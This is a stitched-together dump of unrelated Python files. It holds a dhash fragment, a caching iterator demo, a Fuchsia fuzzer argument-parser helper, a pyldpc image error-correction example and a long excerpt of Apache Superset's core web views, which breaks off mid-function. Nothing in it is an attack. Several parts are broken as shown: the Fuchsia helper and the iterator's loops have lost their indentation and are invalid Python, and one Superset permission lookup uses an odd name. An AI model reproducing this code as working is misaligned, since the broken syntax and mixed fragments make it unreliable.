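    print("dhash distance:", dhash_hamming_distance(calculate_dhash(img_a),
                                                    calculate_dhash(img_b)))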
|
the-stack_106_22041
|
from time import sleep
class Iteratable:
    """Iterable that generates values lazily (and slowly) on the first pass,
    caching them so later passes replay the cached list without the delay."""
    def __init__(self, max):
        self.max = max
        self.arr = []  # cache of values produced so far
        self.i = 0
    def __iter__(self):
        self.n = 0
        # Once every value has been generated, iterate over the cached list
        if len(self.arr) == self.max and self.i + 1 <= self.max:
            return iter(self.arr)
        return self
    def __next__(self):
        if self.n < self.max and len(self.arr) < self.max:
            sleep(1)  # simulate an expensive computation
            self.n += 1
            self.arr.append(self.n)
            return self.n
        else:
            raise StopIteration
p = Iteratable(5)
for i in p:
print(i)
for i in p:
print(i)
|
the-stack_106_22043
|
#!/usr/bin/env python
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
from host import Host
class Args:
@classmethod
def make_parser(cls, description, name_required=True, label_present=False):
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
'-d',
'--device',
help='Name of device, only needed when multiple devices are present.')
parser.add_argument(
'-f',
'--foreground',
action='store_true',
help='If true, display fuzzer output.')
parser.add_argument(
'-n',
'--no-cipd',
action='store_true',
help='Skip steps which involve transferring packages to or from CIPD')
parser.add_argument(
'-o', '--output', help='Path under which to store results.')
parser.add_argument(
'-s',
'--staging',
help='Host directory to use for un/packing corpus bundles.' +
' Defaults to a temporary directory.')
name_help = ('Fuzzer name to match. This can be part of the package and/or'
+ ' target name, e.g. "foo", "bar", and "foo/bar" all match' +
' "foo_package/bar_target".')
if name_required:
parser.add_argument('name', help=name_help)
else:
parser.add_argument('name', nargs='?', help=name_help)
if label_present:
parser.add_argument(
'label',
nargs='?',
default='latest',
help='If a directory, installs a corpus from that location. ' +
'Otherwise installs the labeled version from CIPD. In this case, ' +
'"label" may be either a "ref" or a key:value "tag" as described ' +
'in `cipd help`. By default, corpora are uploaded with the ' +
'"latest" ref and a tag of "integration:<git-revision>" ' +
'corresponding to current revision of the //integration repository.')
return parser
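# Usage sketch (assumption, not part of the original file): build a parser with
# an optional corpus label and parse hypothetical command-line arguments.
#
#   parser = Args.make_parser('Manage a fuzzer corpus', label_present=True)
#   args = parser.parse_args(['foo/bar', 'latest', '--foreground'])
#   print(args.name, args.label, args.foreground)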
|
the-stack_106_22045
|
import numpy as np
from pyldpc import make_ldpc, ldpc_images
from pyldpc.utils_img import gray2bin # , rgb2bin
from matplotlib import pyplot as plt
from PIL import Image
from time import time
##################################################################
# Let's see the image we are going to be working with
tree = Image.open("data/tree.png")
# convert it to grayscale and keep one channel
tree = np.asarray(tree.convert('LA'))[:, :, 0]
# Convert it to a binary matrix
tree_bin = gray2bin(tree)
print("tree shape: (%s, %s)" % tree.shape)
print("Binary tree shape: (%s, %s, %s)" % tree_bin.shape)
n = 200
d_v = 3
d_c = 4
seed = 42
##################################################################
# First we create a small LDPC code i.e a pair of decoding and coding matrices
# H and G. H is a regular parity-check matrix with d_v ones per row
# and d_c ones per column
H, G = make_ldpc(n, d_v, d_c, seed=seed, systematic=True, sparse=True)
##################################################################
# Now we simulate the transmission with Gaussian white noise
# and recover the original image via belief-propagation.
snr = 8
tree_coded, tree_noisy = ldpc_images.encode_img(G, tree_bin, snr, seed=seed)
print("Coded tree shape", tree_coded.shape)
t = time()
tree_decoded = ldpc_images.decode_img(G, H, tree_coded, snr, tree_bin.shape)
t = time() - t
print("tree | Decoding time: ", t)
error_decoded_tree = abs(tree - tree_decoded).mean()
error_noisy_tree = abs(tree_noisy - tree).mean()
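# Report the mean absolute error of the noisy and the decoded images
print("tree | noisy error: %.4f | decoded error: %.4f"
      % (error_noisy_tree, error_decoded_tree))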
plt.imshow(tree, 'gray')
plt.show()
plt.imshow(tree_noisy, 'gray')
plt.show()
plt.imshow(tree_decoded, 'gray')
plt.show()
|
the-stack_106_22046
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines, invalid-name
from __future__ import annotations
import logging
import re
from contextlib import closing
from datetime import datetime, timedelta
from typing import Any, Callable, cast, Dict, List, Optional, Union
from urllib import parse
import backoff
import humanize
import pandas as pd
import simplejson as json
from flask import abort, flash, g, redirect, render_template, request, Response
from flask_appbuilder import expose
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_appbuilder.security.decorators import (
has_access,
has_access_api,
permission_name,
)
from flask_appbuilder.security.sqla import models as ab_models
from flask_babel import gettext as __, lazy_gettext as _
from sqlalchemy import and_, or_
from sqlalchemy.exc import DBAPIError, NoSuchModuleError, SQLAlchemyError
from sqlalchemy.orm.session import Session
from sqlalchemy.sql import functions as func
from superset import (
app,
appbuilder,
conf,
db,
event_logger,
is_feature_enabled,
results_backend,
results_backend_use_msgpack,
security_manager,
sql_lab,
viz,
)
from superset.charts.commands.exceptions import ChartNotFoundError
from superset.charts.dao import ChartDAO
from superset.common.chart_data import ChartDataResultFormat, ChartDataResultType
from superset.common.db_query_status import QueryStatus
from superset.connectors.base.models import BaseDatasource
from superset.connectors.sqla.models import (
AnnotationDatasource,
SqlaTable,
SqlMetric,
TableColumn,
)
from superset.dashboards.commands.importers.v0 import ImportDashboardsCommand
from superset.dashboards.dao import DashboardDAO
from superset.dashboards.permalink.commands.get import GetDashboardPermalinkCommand
from superset.dashboards.permalink.exceptions import DashboardPermalinkGetFailedError
from superset.databases.commands.exceptions import DatabaseInvalidError
from superset.databases.dao import DatabaseDAO
from superset.databases.filters import DatabaseFilter
from superset.databases.utils import make_url_safe
from superset.datasets.commands.exceptions import DatasetNotFoundError
from superset.datasource.dao import DatasourceDAO
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.exceptions import (
CacheLoadError,
CertificateException,
DatabaseNotFound,
SerializationError,
SupersetCancelQueryException,
SupersetErrorException,
SupersetException,
SupersetGenericErrorException,
SupersetSecurityException,
SupersetTimeoutException,
)
from superset.explore.form_data.commands.get import GetFormDataCommand
from superset.explore.form_data.commands.parameters import CommandParameters
from superset.explore.permalink.commands.get import GetExplorePermalinkCommand
from superset.explore.permalink.exceptions import ExplorePermalinkGetFailedError
from superset.extensions import async_query_manager, cache_manager
from superset.jinja_context import get_template_processor
from superset.models.core import Database, FavStar, Log
from superset.models.dashboard import Dashboard
from superset.models.datasource_access_request import DatasourceAccessRequest
from superset.models.slice import Slice
from superset.models.sql_lab import Query, TabState
from superset.models.user_attributes import UserAttribute
from superset.queries.dao import QueryDAO
from superset.security.analytics_db_safety import check_sqlalchemy_uri
from superset.sql_lab import get_sql_results
from superset.sql_parse import ParsedQuery
from superset.sql_validators import get_validator_by_name
from superset.sqllab.command import CommandResult, ExecuteSqlCommand
from superset.sqllab.command_status import SqlJsonExecutionStatus
from superset.sqllab.exceptions import (
QueryIsForbiddenToAccessException,
SqlLabException,
)
from superset.sqllab.execution_context_convertor import ExecutionContextConvertor
from superset.sqllab.limiting_factor import LimitingFactor
from superset.sqllab.query_render import SqlQueryRenderImpl
from superset.sqllab.sql_json_executer import (
ASynchronousSqlJsonExecutor,
SqlJsonExecutor,
SynchronousSqlJsonExecutor,
)
from superset.sqllab.sqllab_execution_context import SqlJsonExecutionContext
from superset.sqllab.utils import apply_display_max_row_configuration_if_require
from superset.sqllab.validators import CanAccessQueryValidatorImpl
from superset.superset_typing import FlaskResponse
from superset.tasks.async_queries import load_explore_json_into_cache
from superset.utils import core as utils, csv
from superset.utils.async_query_manager import AsyncQueryTokenException
from superset.utils.cache import etag_cache
from superset.utils.core import (
apply_max_row_limit,
DatasourceType,
ReservedUrlParameters,
)
from superset.utils.dates import now_as_float
from superset.utils.decorators import check_dashboard_access
from superset.views.base import (
api,
BaseSupersetView,
check_ownership,
common_bootstrap_payload,
create_table_permissions,
CsvResponse,
data_payload_response,
generate_download_headers,
get_error_msg,
handle_api_exception,
json_error_response,
json_errors_response,
json_success,
validate_sqlatable,
)
from superset.views.utils import (
_deserialize_results_payload,
bootstrap_user_data,
check_datasource_perms,
check_explore_cache_perms,
check_resource_permissions,
check_slice_perms,
get_dashboard_extra_filters,
get_datasource_info,
get_form_data,
get_viz,
is_owner,
sanitize_datasource_data,
)
from superset.viz import BaseViz
config = app.config
SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT = config["SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT"]
stats_logger = config["STATS_LOGGER"]
DAR = DatasourceAccessRequest
logger = logging.getLogger(__name__)
DATABASE_KEYS = [
"allow_file_upload",
"allow_ctas",
"allow_cvas",
"allow_dml",
"allow_multi_schema_metadata_fetch",
"allow_run_async",
"allows_subquery",
"backend",
"database_name",
"expose_in_sqllab",
"force_ctas_schema",
"id",
"disable_data_preview",
]
DATASOURCE_MISSING_ERR = __("The data source seems to have been deleted")
USER_MISSING_ERR = __("The user seems to have been deleted")
PARAMETER_MISSING_ERR = (
"Please check your template parameters for syntax errors and make sure "
"they match across your SQL query and Set Parameters. Then, try running "
"your query again."
)
SqlResults = Dict[str, Any]
class Superset(BaseSupersetView): # pylint: disable=too-many-public-methods
"""The base views for Superset!"""
logger = logging.getLogger(__name__)
@has_access_api
@event_logger.log_this
@expose("/datasources/")
def datasources(self) -> FlaskResponse:
return self.json_response(
sorted(
[
datasource.short_data
for datasource in security_manager.get_user_datasources()
if datasource.short_data.get("name")
],
key=lambda datasource: datasource["name"],
)
)
@has_access_api
@event_logger.log_this
@expose("/override_role_permissions/", methods=["POST"])
def override_role_permissions(self) -> FlaskResponse:
"""Updates the role with the give datasource permissions.
Permissions not in the request will be revoked. This endpoint should
be available to admins only. Expects JSON in the format:
{
'role_name': '{role_name}',
'database': [{
'datasource_type': '{table|druid}',
'name': '{database_name}',
'schema': [{
'name': '{schema_name}',
'datasources': ['{datasource name}, {datasource name}']
}]
}]
}
"""
data = request.get_json(force=True)
role_name = data["role_name"]
databases = data["database"]
db_ds_names = set()
for dbs in databases:
for schema in dbs["schema"]:
for ds_name in schema["datasources"]:
fullname = utils.get_datasource_full_name(
dbs["name"], ds_name, schema=schema["name"]
)
db_ds_names.add(fullname)
existing_datasources = SqlaTable.get_all_datasources(db.session)
datasources = [d for d in existing_datasources if d.full_name in db_ds_names]
role = security_manager.find_role(role_name)
# remove all permissions
role.permissions = []
# grant permissions to the list of datasources
granted_perms = []
for datasource in datasources:
view_menu_perm = security_manager.find_permission_view_menu(
view_menu_name=datasource.perm, permission_name="datasource_access"
)
# prevent creating empty permissions
if view_menu_perm and view_menu_perm.view_menu:
role.permissions.append(view_menu_perm)
granted_perms.append(view_menu_perm.view_menu.name)
db.session.commit()
return self.json_response(
{"granted": granted_perms, "requested": list(db_ds_names)}, status=201
)
@has_access
@event_logger.log_this
@expose("/request_access/")
def request_access(self) -> FlaskResponse:
datasources = set()
dashboard_id = request.args.get("dashboard_id")
if dashboard_id:
dash = db.session.query(Dashboard).filter_by(id=int(dashboard_id)).one()
datasources |= dash.datasources
datasource_id = request.args.get("datasource_id")
datasource_type = request.args.get("datasource_type")
if datasource_id and datasource_type:
ds_class = DatasourceDAO.sources.get(datasource_type)
datasource = (
db.session.query(ds_class).filter_by(id=int(datasource_id)).one()
)
datasources.add(datasource)
has_access_ = all(
(
datasource and security_manager.can_access_datasource(datasource)
for datasource in datasources
)
)
if has_access_:
return redirect("/superset/dashboard/{}".format(dashboard_id))
if request.args.get("action") == "go":
for datasource in datasources:
access_request = DAR(
datasource_id=datasource.id, datasource_type=datasource.type
)
db.session.add(access_request)
db.session.commit()
flash(__("Access was requested"), "info")
return redirect("/")
return self.render_template(
"superset/request_access.html",
datasources=datasources,
datasource_names=", ".join([o.name for o in datasources]),
)
@has_access
@event_logger.log_this
@expose("/approve")
def approve(self) -> FlaskResponse: # pylint: disable=too-many-locals,no-self-use
def clean_fulfilled_requests(session: Session) -> None:
for dar in session.query(DAR).all():
datasource = DatasourceDAO.get_datasource(
session, DatasourceType(dar.datasource_type), dar.datasource_id
)
if not datasource or security_manager.can_access_datasource(datasource):
                    # Drop the request if the dataset no longer exists or access is already granted
session.delete(dar)
session.commit()
datasource_type = request.args["datasource_type"]
datasource_id = request.args["datasource_id"]
created_by_username = request.args.get("created_by")
role_to_grant = request.args.get("role_to_grant")
role_to_extend = request.args.get("role_to_extend")
session = db.session
datasource = DatasourceDAO.get_datasource(
session, DatasourceType(datasource_type), int(datasource_id)
)
if not datasource:
flash(DATASOURCE_MISSING_ERR, "alert")
return json_error_response(DATASOURCE_MISSING_ERR)
requested_by = security_manager.find_user(username=created_by_username)
if not requested_by:
flash(USER_MISSING_ERR, "alert")
return json_error_response(USER_MISSING_ERR)
requests = (
session.query(DAR)
.filter( # pylint: disable=comparison-with-callable
DAR.datasource_id == datasource_id,
DAR.datasource_type == datasource_type,
DAR.created_by_fk == requested_by.id,
)
.all()
)
if not requests:
err = __("The access requests seem to have been deleted")
flash(err, "alert")
return json_error_response(err)
# check if you can approve
if security_manager.can_access_all_datasources() or check_ownership(
datasource, raise_if_false=False
):
# can by done by admin only
if role_to_grant:
role = security_manager.find_role(role_to_grant)
requested_by.roles.append(role)
msg = __(
"%(user)s was granted the role %(role)s that gives access "
"to the %(datasource)s",
user=requested_by.username,
role=role_to_grant,
datasource=datasource.full_name,
)
utils.notify_user_about_perm_udate(
g.user,
requested_by,
role,
datasource,
"email/role_granted.txt",
app.config,
)
flash(msg, "info")
if role_to_extend:
perm_view = security_manager.find_permission_view_menu(
"email/datasource_access", datasource.perm
)
role = security_manager.find_role(role_to_extend)
security_manager.add_permission_role(role, perm_view)
msg = __(
"Role %(r)s was extended to provide the access to "
"the datasource %(ds)s",
r=role_to_extend,
ds=datasource.full_name,
)
utils.notify_user_about_perm_udate(
g.user,
requested_by,
role,
datasource,
"email/role_extended.txt",
app.config,
)
flash(msg, "info")
clean_fulfilled_requests(session)
else:
flash(__("You have no permission to approve this request"), "danger")
return redirect("/accessrequestsmodelview/list/")
for request_ in requests:
session.delete(request_)
session.commit()
return redirect("/accessrequestsmodelview/list/")
@has_access
@event_logger.log_this
@expose("/slice/<int:slice_id>/")
def slice(self, slice_id: int) -> FlaskResponse: # pylint: disable=no-self-use
_, slc = get_form_data(slice_id, use_slice_data=True)
if not slc:
abort(404)
endpoint = "/superset/explore/?form_data={}".format(
parse.quote(json.dumps({"slice_id": slice_id}))
)
is_standalone_mode = ReservedUrlParameters.is_standalone_mode()
if is_standalone_mode:
endpoint += f"&{ReservedUrlParameters.STANDALONE}={is_standalone_mode}"
return redirect(endpoint)
def get_query_string_response(self, viz_obj: BaseViz) -> FlaskResponse:
query = None
try:
query_obj = viz_obj.query_obj()
if query_obj:
query = viz_obj.datasource.get_query_str(query_obj)
except Exception as ex: # pylint: disable=broad-except
err_msg = utils.error_msg_from_exception(ex)
logger.exception(err_msg)
return json_error_response(err_msg)
if not query:
query = "No query."
return self.json_response(
{"query": query, "language": viz_obj.datasource.query_language}
)
def get_raw_results(self, viz_obj: BaseViz) -> FlaskResponse:
payload = viz_obj.get_df_payload()
if viz_obj.has_error(payload):
return json_error_response(payload=payload, status=400)
return self.json_response(
{
"data": payload["df"].to_dict("records"),
"colnames": payload.get("colnames"),
"coltypes": payload.get("coltypes"),
},
)
def get_samples(self, viz_obj: BaseViz) -> FlaskResponse:
return self.json_response(viz_obj.get_samples())
@staticmethod
def send_data_payload_response(viz_obj: BaseViz, payload: Any) -> FlaskResponse:
return data_payload_response(*viz_obj.payload_json_and_has_error(payload))
def generate_json(
self, viz_obj: BaseViz, response_type: Optional[str] = None
) -> FlaskResponse:
if response_type == ChartDataResultFormat.CSV:
return CsvResponse(
viz_obj.get_csv(), headers=generate_download_headers("csv")
)
if response_type == ChartDataResultType.QUERY:
return self.get_query_string_response(viz_obj)
if response_type == ChartDataResultType.RESULTS:
return self.get_raw_results(viz_obj)
if response_type == ChartDataResultType.SAMPLES:
return self.get_samples(viz_obj)
payload = viz_obj.get_payload()
return self.send_data_payload_response(viz_obj, payload)
@event_logger.log_this
@api
@has_access_api
@expose("/slice_json/<int:slice_id>")
@etag_cache()
@check_resource_permissions(check_slice_perms)
def slice_json(self, slice_id: int) -> FlaskResponse:
form_data, slc = get_form_data(slice_id, use_slice_data=True)
if not slc:
return json_error_response("The slice does not exist")
if not slc.datasource:
return json_error_response("The slice's datasource does not exist")
try:
viz_obj = get_viz(
datasource_type=slc.datasource.type,
datasource_id=slc.datasource.id,
form_data=form_data,
force=False,
)
return self.generate_json(viz_obj)
except SupersetException as ex:
return json_error_response(utils.error_msg_from_exception(ex))
@api
@has_access_api
@event_logger.log_this
@expose("/annotation_json/<int:layer_id>")
def annotation_json( # pylint: disable=no-self-use
self, layer_id: int
) -> FlaskResponse:
form_data = get_form_data()[0]
force = utils.parse_boolean_string(request.args.get("force"))
form_data["layer_id"] = layer_id
form_data["filters"] = [{"col": "layer_id", "op": "==", "val": layer_id}]
# Set all_columns to ensure the TableViz returns the necessary columns to the
# frontend.
form_data["all_columns"] = [
"created_on",
"changed_on",
"id",
"start_dttm",
"end_dttm",
"layer_id",
"short_descr",
"long_descr",
"json_metadata",
"created_by_fk",
"changed_by_fk",
]
datasource = AnnotationDatasource()
viz_obj = viz.viz_types["table"](datasource, form_data=form_data, force=force)
payload = viz_obj.get_payload()
return data_payload_response(*viz_obj.payload_json_and_has_error(payload))
@event_logger.log_this
@api
@has_access_api
@handle_api_exception
@permission_name("explore_json")
@expose("/explore_json/data/<cache_key>", methods=["GET"])
@check_resource_permissions(check_explore_cache_perms)
def explore_json_data(self, cache_key: str) -> FlaskResponse:
"""Serves cached result data for async explore_json calls
`self.generate_json` receives this input and returns different
payloads based on the request args in the first block
TODO: form_data should not be loaded twice from cache
(also loaded in `check_explore_cache_perms`)
"""
try:
cached = cache_manager.cache.get(cache_key)
if not cached:
raise CacheLoadError("Cached data not found")
form_data = cached.get("form_data")
response_type = cached.get("response_type")
datasource_id, datasource_type = get_datasource_info(None, None, form_data)
viz_obj = get_viz(
datasource_type=cast(str, datasource_type),
datasource_id=datasource_id,
form_data=form_data,
force_cached=True,
)
return self.generate_json(viz_obj, response_type)
except SupersetException as ex:
return json_error_response(utils.error_msg_from_exception(ex), 400)
EXPLORE_JSON_METHODS = ["POST"]
if not is_feature_enabled("ENABLE_EXPLORE_JSON_CSRF_PROTECTION"):
EXPLORE_JSON_METHODS.append("GET")
@api
@has_access_api
@handle_api_exception
@event_logger.log_this
@expose(
"/explore_json/<datasource_type>/<int:datasource_id>/",
methods=EXPLORE_JSON_METHODS,
)
@expose("/explore_json/", methods=EXPLORE_JSON_METHODS)
@etag_cache()
@check_resource_permissions(check_datasource_perms)
def explore_json(
self, datasource_type: Optional[str] = None, datasource_id: Optional[int] = None
) -> FlaskResponse:
"""Serves all request that GET or POST form_data
This endpoint evolved to be the entry point of many different
requests that GETs or POSTs a form_data.
`self.generate_json` receives this input and returns different
payloads based on the request args in the first block
TODO: break into one endpoint for each return shape"""
response_type = ChartDataResultFormat.JSON.value
responses: List[Union[ChartDataResultFormat, ChartDataResultType]] = list(
ChartDataResultFormat
)
responses.extend(list(ChartDataResultType))
for response_option in responses:
if request.args.get(response_option) == "true":
response_type = response_option
break
# Verify user has permission to export CSV file
if (
response_type == ChartDataResultFormat.CSV
and not security_manager.can_access("can_csv", "Superset")
):
return json_error_response(
_("You don't have the rights to ") + _("download as csv"),
status=403,
)
form_data = get_form_data()[0]
try:
datasource_id, datasource_type = get_datasource_info(
datasource_id, datasource_type, form_data
)
force = request.args.get("force") == "true"
# TODO: support CSV, SQL query and other non-JSON types
if (
is_feature_enabled("GLOBAL_ASYNC_QUERIES")
and response_type == ChartDataResultFormat.JSON
):
# First, look for the chart query results in the cache.
try:
viz_obj = get_viz(
datasource_type=cast(str, datasource_type),
datasource_id=datasource_id,
form_data=form_data,
force_cached=True,
force=force,
)
payload = viz_obj.get_payload()
# If the chart query has already been cached, return it immediately.
if payload is not None:
return self.send_data_payload_response(viz_obj, payload)
except CacheLoadError:
pass
# Otherwise, kick off a background job to run the chart query.
# Clients will either poll or be notified of query completion,
# at which point they will call the /explore_json/data/<cache_key>
# endpoint to retrieve the results.
try:
async_channel_id = async_query_manager.parse_jwt_from_request(
request
)["channel"]
job_metadata = async_query_manager.init_job(
async_channel_id, g.user.get_id()
)
load_explore_json_into_cache.delay(
job_metadata, form_data, response_type, force
)
except AsyncQueryTokenException:
return json_error_response("Not authorized", 401)
return json_success(json.dumps(job_metadata), status=202)
viz_obj = get_viz(
datasource_type=cast(str, datasource_type),
datasource_id=datasource_id,
form_data=form_data,
force=force,
)
return self.generate_json(viz_obj, response_type)
except SupersetException as ex:
return json_error_response(utils.error_msg_from_exception(ex), 400)
@has_access
@event_logger.log_this
@expose("/import_dashboards/", methods=["GET", "POST"])
def import_dashboards(self) -> FlaskResponse:
"""Overrides the dashboards using json instances from the file."""
import_file = request.files.get("file")
if request.method == "POST" and import_file:
success = False
database_id = request.form.get("db_id")
try:
ImportDashboardsCommand(
{import_file.filename: import_file.read()}, database_id
).run()
success = True
except DatabaseNotFound as ex:
logger.exception(ex)
flash(
_(
"Cannot import dashboard: %(db_error)s.\n"
"Make sure to create the database before "
"importing the dashboard.",
db_error=ex,
),
"danger",
)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
flash(
_(
"An unknown error occurred. "
"Please contact your Superset administrator"
),
"danger",
)
if success:
flash("Dashboard(s) have been imported", "success")
return redirect("/dashboard/list/")
databases = db.session.query(Database).all()
return self.render_template(
"superset/import_dashboards.html", databases=databases
)
@has_access
@event_logger.log_this
@expose("/explore/<datasource_type>/<int:datasource_id>/", methods=["GET", "POST"])
@expose("/explore/", methods=["GET", "POST"])
@expose("/explore/p/<key>/", methods=["GET"])
# pylint: disable=too-many-locals,too-many-branches,too-many-statements
def explore(
self,
datasource_type: Optional[str] = None,
datasource_id: Optional[int] = None,
key: Optional[str] = None,
) -> FlaskResponse:
initial_form_data = {}
form_data_key = request.args.get("form_data_key")
if key is not None:
command = GetExplorePermalinkCommand(g.user, key)
try:
permalink_value = command.run()
if permalink_value:
state = permalink_value["state"]
initial_form_data = state["formData"]
url_params = state.get("urlParams")
if url_params:
initial_form_data["url_params"] = dict(url_params)
else:
return json_error_response(
_("Error: permalink state not found"), status=404
)
except (ChartNotFoundError, ExplorePermalinkGetFailedError) as ex:
flash(__("Error: %(msg)s", msg=ex.message), "danger")
return redirect("/chart/list/")
elif form_data_key:
parameters = CommandParameters(actor=g.user, key=form_data_key)
value = GetFormDataCommand(parameters).run()
initial_form_data = json.loads(value) if value else {}
if not initial_form_data:
slice_id = request.args.get("slice_id")
dataset_id = request.args.get("dataset_id")
if slice_id:
initial_form_data["slice_id"] = slice_id
if form_data_key:
flash(
_("Form data not found in cache, reverting to chart metadata.")
)
elif dataset_id:
initial_form_data["datasource"] = f"{dataset_id}__table"
if form_data_key:
flash(
_(
"Form data not found in cache, reverting to dataset metadata."
)
)
form_data, slc = get_form_data(
use_slice_data=True, initial_form_data=initial_form_data
)
query_context = request.form.get("query_context")
try:
datasource_id, datasource_type = get_datasource_info(
datasource_id, datasource_type, form_data
)
except SupersetException:
datasource_id = None
            # fall back to the table type for unknown datasources
datasource_type = SqlaTable.type
datasource: Optional[BaseDatasource] = None
if datasource_id is not None:
try:
datasource = DatasourceDAO.get_datasource(
db.session,
DatasourceType(cast(str, datasource_type)),
datasource_id,
)
except DatasetNotFoundError:
pass
datasource_name = datasource.name if datasource else _("[Missing Dataset]")
if datasource:
if config["ENABLE_ACCESS_REQUEST"] and (
not security_manager.can_access_datasource(datasource)
):
flash(
__(security_manager.get_datasource_access_error_msg(datasource)),
"danger",
)
return redirect(
"superset/request_access/?"
f"datasource_type={datasource_type}&"
f"datasource_id={datasource_id}&"
)
viz_type = form_data.get("viz_type")
if not viz_type and datasource and datasource.default_endpoint:
return redirect(datasource.default_endpoint)
# slc perms
slice_add_perm = security_manager.can_access("can_write", "Chart")
slice_overwrite_perm = is_owner(slc, g.user) if slc else False
slice_download_perm = security_manager.can_access("can_csv", "Superset")
form_data["datasource"] = str(datasource_id) + "__" + cast(str, datasource_type)
# On explore, merge legacy and extra filters into the form data
utils.convert_legacy_filters_into_adhoc(form_data)
utils.merge_extra_filters(form_data)
# merge request url params
if request.method == "GET":
utils.merge_request_params(form_data, request.args)
# handle save or overwrite
action = request.args.get("action")
if action == "overwrite" and not slice_overwrite_perm:
return json_error_response(
_("You don't have the rights to ") + _("alter this ") + _("chart"),
status=403,
)
if action == "saveas" and not slice_add_perm:
return json_error_response(
_("You don't have the rights to ") + _("create a ") + _("chart"),
status=403,
)
if action in ("saveas", "overwrite") and datasource:
return self.save_or_overwrite_slice(
slc,
slice_add_perm,
slice_overwrite_perm,
slice_download_perm,
datasource.id,
datasource.type,
datasource.name,
query_context,
)
standalone_mode = ReservedUrlParameters.is_standalone_mode()
force = request.args.get("force") in {"force", "1", "true"}
dummy_datasource_data: Dict[str, Any] = {
"type": datasource_type,
"name": datasource_name,
"columns": [],
"metrics": [],
"database": {"id": 0, "backend": ""},
}
try:
datasource_data = datasource.data if datasource else dummy_datasource_data
except (SupersetException, SQLAlchemyError):
datasource_data = dummy_datasource_data
if datasource:
datasource_data["owners"] = datasource.owners_data
if isinstance(datasource, Query):
datasource_data["columns"] = datasource.columns
bootstrap_data = {
"can_add": slice_add_perm,
"can_download": slice_download_perm,
"datasource": sanitize_datasource_data(datasource_data),
"form_data": form_data,
"datasource_id": datasource_id,
"datasource_type": datasource_type,
"slice": slc.data if slc else None,
"standalone": standalone_mode,
"force": force,
"user": bootstrap_user_data(g.user, include_perms=True),
"forced_height": request.args.get("height"),
"common": common_bootstrap_payload(),
}
if slc:
title = slc.slice_name
elif datasource:
table_name = (
datasource.table_name
if datasource_type == "table"
else datasource.datasource_name
)
title = _("Explore - %(table)s", table=table_name)
else:
title = _("Explore")
return self.render_template(
"superset/basic.html",
bootstrap_data=json.dumps(
bootstrap_data, default=utils.pessimistic_json_iso_dttm_ser
),
entry="explore",
title=title.__str__(),
standalone_mode=standalone_mode,
)
@api
@handle_api_exception
@has_access_api
@event_logger.log_this
@expose("/filter/<datasource_type>/<int:datasource_id>/<column>/")
def filter( # pylint: disable=no-self-use
self, datasource_type: str, datasource_id: int, column: str
) -> FlaskResponse:
"""
Endpoint to retrieve values for specified column.
:param datasource_type: Type of datasource e.g. table
:param datasource_id: Datasource id
:param column: Column name to retrieve values for
:returns: The Flask response
:raises SupersetSecurityException: If the user cannot access the resource
"""
# TODO: Cache endpoint by user, datasource and column
datasource = DatasourceDAO.get_datasource(
db.session, DatasourceType(datasource_type), datasource_id
)
if not datasource:
return json_error_response(DATASOURCE_MISSING_ERR)
datasource.raise_for_access()
row_limit = apply_max_row_limit(config["FILTER_SELECT_ROW_LIMIT"])
payload = json.dumps(
datasource.values_for_column(column_name=column, limit=row_limit),
default=utils.json_int_dttm_ser,
ignore_nan=True,
)
return json_success(payload)
@staticmethod
def remove_extra_filters(filters: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
"""Extra filters are ones inherited from the dashboard's temporary context
Those should not be saved when saving the chart"""
return [f for f in filters if not f.get("isExtra")]
def save_or_overwrite_slice(
# pylint: disable=too-many-arguments,too-many-locals
self,
slc: Optional[Slice],
slice_add_perm: bool,
slice_overwrite_perm: bool,
slice_download_perm: bool,
datasource_id: int,
datasource_type: str,
datasource_name: str,
query_context: Optional[str] = None,
) -> FlaskResponse:
"""Save or overwrite a slice"""
slice_name = request.args.get("slice_name")
action = request.args.get("action")
form_data = get_form_data()[0]
if action == "saveas":
if "slice_id" in form_data:
form_data.pop("slice_id") # don't save old slice_id
slc = Slice(owners=[g.user] if g.user else [])
form_data["adhoc_filters"] = self.remove_extra_filters(
form_data.get("adhoc_filters") or []
)
assert slc
slc.params = json.dumps(form_data, indent=2, sort_keys=True)
slc.datasource_name = datasource_name
slc.viz_type = form_data["viz_type"]
slc.datasource_type = datasource_type
slc.datasource_id = datasource_id
slc.last_saved_by = g.user
slc.last_saved_at = datetime.now()
slc.slice_name = slice_name
slc.query_context = query_context
if action == "saveas" and slice_add_perm:
ChartDAO.save(slc)
msg = _("Chart [{}] has been saved").format(slc.slice_name)
flash(msg, "success")
elif action == "overwrite" and slice_overwrite_perm:
ChartDAO.overwrite(slc)
msg = _("Chart [{}] has been overwritten").format(slc.slice_name)
flash(msg, "success")
# Adding slice to a dashboard if requested
dash: Optional[Dashboard] = None
save_to_dashboard_id = request.args.get("save_to_dashboard_id")
new_dashboard_name = request.args.get("new_dashboard_name")
if save_to_dashboard_id:
# Adding the chart to an existing dashboard
dash = cast(
Dashboard,
db.session.query(Dashboard)
.filter_by(id=int(save_to_dashboard_id))
.one(),
)
# check edit dashboard permissions
dash_overwrite_perm = check_ownership(dash, raise_if_false=False)
if not dash_overwrite_perm:
return json_error_response(
_("You don't have the rights to ")
+ _("alter this ")
+ _("dashboard"),
status=403,
)
flash(
_("Chart [{}] was added to dashboard [{}]").format(
slc.slice_name, dash.dashboard_title
),
"success",
)
elif new_dashboard_name:
# Creating and adding to a new dashboard
# check create dashboard permissions
dash_add_perm = security_manager.can_access("can_write", "Dashboard")
if not dash_add_perm:
return json_error_response(
_("You don't have the rights to ")
+ _("create a ")
+ _("dashboard"),
